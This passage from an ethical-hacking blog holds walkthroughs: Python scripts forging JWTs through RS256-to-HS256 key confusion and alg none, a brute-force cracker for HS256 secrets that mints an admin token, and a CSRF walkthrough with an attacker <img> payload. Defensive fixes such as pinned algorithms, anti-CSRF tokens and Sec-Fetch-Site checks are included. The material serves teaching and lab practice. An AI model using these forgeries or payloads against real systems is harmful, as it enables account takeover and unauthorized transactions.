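    """Constructed victim token. The RSA signature is a dummy; both attacks discard it."""
    parts = [encode_part({"typ": "JWT", "alg": "RS256"}), encode_part(payload),
             b64url_encode(b"dummy-rsa-signature")]
    return ".".join(parts)


def confuse_rs256_to_hs256(token: str, public_key_pem: bytes, overrides: dict = None) -> str:
    """Attack 1: alg RS256 -> HS256, signed with the public key bytes as the HMAC secret."""
    header, payload = decode_header(token), decode_payload(token)
    if header.get("alg") != "RS256":
        raise ValueError("expected an RS256 token")
    header["alg"] = "HS256"
    payload.update(overrides or {})
    h, p = encode_part(header), encode_part(payload)
    return f"{h}.{p}." + b64url_encode(hs256(f"{h}.{p}".encode(), public_key_pem))


def forge_none_token(token: str, overrides: dict = None) -> str:
    """Attack 2: alg none, signature dropped. The trailing '.' stays: a JWT is always three parts."""
    header, payload = decode_header(token), decode_payload(token)
    header["alg"] = "none"
    payload.update(overrides or {})
    return f"{encode_part(header)}.{encode_part(payload)}."


def vulnerable_verify(token: str, key: bytes) -> bool:
    """Models a library that lets the token choose the algorithm, while the server
    passes the same `key` (its PEM public key) on every call."""
    h, p, s = token.split(".")
    alg = decode_header(token).get("alg")
    if alg == "none":        # bug 2: unsigned token accepted as valid
        return True
    if alg == "HS256":       # bug 1: the public key ends up as the HMAC secret
        return hmac.compare_digest(hs256(f"{h}.{p}".encode(), key), b64url_decode(s))
    if alg == "RS256":
        raise NotImplementedError("RSA verification needs a crypto library; not shown here")
    return False


def pinned_verify(token: str, key: bytes, expected_alg: str) -> bool:
    """Fix for both bugs: the server decides the algorithm; the header must merely agree."""
    if expected_alg == "none" or decode_header(token).get("alg") != expected_alg:
        return False
    return vulnerable_verify(token, key)


if __name__ == "__main__":
    victim = make_rs256_token({"iss": "http://localhost", "data": {"hello": "world"}})
    forged_hs = confuse_rs256_to_hs256(victim, PUBLIC_KEY_PEM, {"role": "admin"})
    forged_none = forge_none_token(victim, {"role": "admin"})
    for name, tok in (("HS256 confusion", forged_hs), ("alg none", forged_none)):
        print(f"{name}: {tok}")
        print("  vulnerable verifier:", vulnerable_verify(tok, PUBLIC_KEY_PEM),
              "| pinned RS256 verifier:", pinned_verify(tok, PUBLIC_KEY_PEM, "RS256"))
```

Run it as a script to see both forged tokens and the verdicts. Two details matter in practice: the HMAC key must be the exact bytes of the PEM file, trailing newline included (which is why the xxd -p step hex-encodes the whole file), and a none token still needs its trailing dot. The fix in real code is the equivalent of pinned_verify: pass an explicit algorithm list to the library, for instance PyJWT's jwt.decode(token, key, algorithms=["RS256"]), and never let the token choose.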


    #1 What is the flag?


    JWT once again


    Recall that an HS256 JWT signature is calculated using a secret. The exact formula is

    HMACSHA256( base64UrlEncode(header) + "." + base64UrlEncode(payload), secret)

    Since we have the full JWT token (header, payload and signature), the secret can be brute forced offline: compute the HMAC for candidate secrets until the result matches the signature in the token. If the secret can be brute forced, the attacker can sign their own JWT tokens.


    Bruteforcing JWT tokens.


    To brute force these secrets we'll be using a tool called jwt-cracker. The syntax of jwt-cracker is jwt-cracker <token> [alphabet] [max-length], where alphabet and max-length are optional parameters.


     

    Explanation of parameters:

    Token: the HS256 JWT token

    Alphabet: the characters the cracker uses to build candidate secrets (default: "abcdefghijklmnopqrstuvwxyz")

    max-length: the maximum expected length of the secret (12 by default)

    Using an example token from jwt.io, let's see how long it takes to crack.




    In 4 seconds, we've tried 300000 passwords and cracked the secret!
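As an added example (not the page's own code and not jwt-cracker's), here is the same brute force in pure Python: it recomputes HMACSHA256(header.payload, candidate) for every candidate secret over an alphabet up to a maximum length and stops when the digest matches the token's signature. The token is constructed inside the block by signing the jwt.io sample claims with a deliberately weak secret, pwn, so the run finishes instantly.

```python
import base64
import hashlib
import hmac
import itertools
import json
import string


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def issue_hs256(payload: dict, secret: bytes) -> str:
    """Constructed token, built the way the app would: HMACSHA256 over header.payload."""
    header = b64url_encode(b'{"alg":"HS256","typ":"JWT"}')
    body = b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url_encode(sig)}"


def crack_hs256(token: str, alphabet: str = string.ascii_lowercase, max_length: int = 12):
    """Offline brute force, same idea as: jwt-cracker <token> [alphabet] [max-length].
    Returns the secret, or None if nothing up to max_length reproduces the signature."""
    header, body, sig_b64 = token.split(".")
    if json.loads(b64url_decode(header)).get("alg") != "HS256":
        raise ValueError("only HS256 tokens can be cracked this way")
    signing_input = f"{header}.{body}".encode()
    target = b64url_decode(sig_b64)
    for length in range(1, max_length + 1):                   # shortest secrets first
        for candidate in itertools.product(alphabet, repeat=length):
            secret = "".join(candidate).encode()
            if hmac.new(secret, signing_input, hashlib.sha256).digest() == target:
                return secret.decode()
    return None


def keyspace_size(alphabet: str, max_length: int) -> int:
    """Number of candidates crack_hs256 may have to try: sum of |alphabet|^n for n = 1..max_length."""
    return sum(len(alphabet) ** n for n in range(1, max_length + 1))


SECRET = b"pwn"  # constructed weak secret; three lowercase letters are at most 18,278 guesses

if __name__ == "__main__":
    token = issue_hs256({"sub": "1234567890", "name": "John Doe", "iat": 1516239022}, SECRET)
    print("token:", token)
    found = crack_hs256(token)
    print("recovered secret:", found)
    # With the secret known, the attacker mints tokens with any claims they like.
    print("forged admin token:", issue_hs256({"sub": "1", "role": "admin"}, found.encode()))
```

keyspace_size shows why jwt-cracker's defaults find short lowercase secrets in seconds: three lowercase letters is 18,278 guesses, eight is about 217 billion, and a proper secret (32 random bytes) is out of reach entirely. Nothing in the token tells you how strong the secret is; only the operator who chose it can fix that.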




    [Bonus Section]: Challenge


    Given the following token
    eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.it4Lj1WEPkrhRo9a2-XHMGtYburgHbdS5s7Iuc1YKOE

     

    What is the secret?

    Ans :- Please mention in comment below






    Disclaimer



    This was written for educational purpose and pentest only.
    The author will not be responsible for any damage ..!
    The author of this tool is not responsible for any misuse of the information.
    You will not misuse the information to gain unauthorized access.
    This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


    All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


    All tutorials and videos have been made using our own routers, servers, websites and other resources, they do not contain any illegal activity. We do not promote, encourage, support or excite any illegal activity or hacking without written permission in general. We want to raise security awareness and inform our readers on how to prevent themselves from being a victim of hackers. If you plan to use the information for illegal purposes, please leave this website now. We cannot be held responsible for any misuse of the given information.



    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)



  • TryHackMe CSRF walkthrough






    [CSRF]: What is CSRF



    Cross-Site Request Forgery, known as CSRF, occurs when a user visits a page on one site that makes the user's browser perform an action on a different site. For instance, say a user clicks a link to a website created by an attacker; on that website is an HTML tag such as <img src="https://vulnerable-website.com/email/change?email=pwned@evil-user.net">. The browser fetches that URL and automatically attaches the user's cookies for vulnerable-website.com, which changes the account email to "pwned@evil-user.net". CSRF works because it's the victim's own browser, carrying the victim's session, that makes the request, so all the site sees is a logged-in user making a normal-looking request.



    This opens the door to the user's account being fully compromised, for example through a password or email reset. The severity of this cannot be overstated: it can give an attacker access to personal information about a user, up to credit card details in an extreme case.




    [CSRF]: Manual exploitation of CSRF



    Let's take an example application








    It seems simple enough. As user Bob, I can send funds to either Bob or Alice with any of the available balance in my account. Let's take a closer look at the request in Burp.












    This is looking good: parameters we can control, a state-changing GET request, and a session cookie that the browser attaches automatically. Everything points to CSRF. Let's build the attacker's page. Putting <img src="http://localhost:3000/transfer?to=alice&amount=100"> into an HTML file and hosting it with SimpleHTTPServer should move 100 from Bob to Alice as soon as Bob views the page. Let's see if it does!


    Woohoo, CSRF exploited!
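As an added example (not the page's or TryHackMe's code), here is a stdlib-only Python model of the transfer endpoint: the vulnerable behaviour seen above next to a hardened version, driven by the request the victim's browser sends after rendering the <img> tag. The Request model, the session cookie value s3ss10n-bob, the starting balances and the response strings are all constructed for the example.

```python
from dataclasses import dataclass, field
import hmac
import secrets

# The attacker's page from the walkthrough. The victim's browser fetches the image URL
# and attaches the bank's session cookie by itself, so the server sees a normal request.
ATTACKER_HTML = '<img src="http://localhost:3000/transfer?to=alice&amount=100">'


@dataclass
class Request:
    """Only the parts of an HTTP request the CSRF decision depends on (constructed model)."""
    method: str
    params: dict
    cookies: dict = field(default_factory=dict)
    headers: dict = field(default_factory=dict)


class Bank:
    def __init__(self):
        self.balances = {"bob": 500, "alice": 0}
        self.sessions = {"s3ss10n-bob": "bob"}      # session cookie value -> user
        self.csrf_tokens = {}                       # session cookie value -> anti-CSRF token

    def _user(self, req: Request):
        return self.sessions.get(req.cookies.get("session"))

    def _move(self, src: str, dst: str, amount: int) -> str:
        if amount <= 0 or self.balances.get(src, 0) < amount:
            return "400 bad amount"
        self.balances[src] -= amount
        self.balances[dst] = self.balances.get(dst, 0) + amount
        return "200 ok"

    def vulnerable_transfer(self, req: Request) -> str:
        """Walkthrough behaviour: a valid session cookie is all it takes, GET included."""
        user = self._user(req)
        if not user:
            return "401 not logged in"
        return self._move(user, req.params["to"], int(req.params["amount"]))

    def issue_csrf_token(self, session_cookie: str) -> str:
        """Embedded in the bank's own transfer form; the attacker's page never sees it."""
        token = secrets.token_hex(16)
        self.csrf_tokens[session_cookie] = token
        return token

    def hardened_transfer(self, req: Request) -> str:
        """Three independent checks; any one of them alone defeats the <img> trick."""
        user = self._user(req)
        if not user:
            return "401 not logged in"
        if req.method != "POST":                    # state changes never ride on GET
            return "405 method not allowed"
        site = req.headers.get("Sec-Fetch-Site")    # set by current browsers, not spoofable from a page
        if site not in (None, "same-origin", "none"):
            return "403 cross-site request"
        expected = self.csrf_tokens.get(req.cookies.get("session"))
        supplied = req.params.get("csrf", "")
        if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
            return "403 missing or wrong csrf token"
        return self._move(user, req.params["to"], int(req.params["amount"]))


# What the browser sends after rendering ATTACKER_HTML while bob is logged in.
FORGED = Request("GET", {"to": "alice", "amount": "100"},
                 cookies={"session": "s3ss10n-bob"},
                 headers={"Sec-Fetch-Site": "cross-site", "Sec-Fetch-Dest": "image"})

if __name__ == "__main__":
    bank = Bank()
    print("vulnerable:", bank.vulnerable_transfer(FORGED), bank.balances)
    bank = Bank()
    print("hardened:  ", bank.hardened_transfer(FORGED), bank.balances)
    # A legitimate submit from the bank's own form carries the token and is same-origin.
    token = bank.issue_csrf_token("s3ss10n-bob")
    legit = Request("POST", {"to": "alice", "amount": "100", "csrf": token},
                    cookies={"session": "s3ss10n-bob"}, headers={"Sec-Fetch-Site": "same-origin"})
    print("legit:     ", bank.hardened_transfer(legit), bank.balances)
```

The hardened handler layers three defences so that any one of them stops the attack: state changes only on POST (an <img> can only produce a GET), the Sec-Fetch-Site header that current browsers attach to every request and that a page cannot forge, and a per-session token that the attacker's page has no way to read. Marking the session cookie SameSite=Lax would stop the <img> variant too, since browsers then leave the cookie off cross-site subresource requests; it is a sensible default but not a substitute for the token check.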







     

    [CSRF]: Automatic Exploitation



    Once again there is a nice automated scanner that tests whether a site is vulnerable to CSRF. The tool is called xsrfprobe and can be installed via pip with pip3 install xsrfprobe. It only works with Python 3 (I mean come on, it's 2020, you should be using Python 3 anyway).

     



    The syntax for the command is xsrfprobe -u <url>/<endpoint>. Let's run this against our vulnerable site.








    The output confirms what we found by exploiting it manually: the site is vulnerable to CSRF.




    - Hacking Truth by Kumar Atul Jaiswal



    I hope you liked this post, then you should not forget to share this post at all.
    Thank you so much :-)



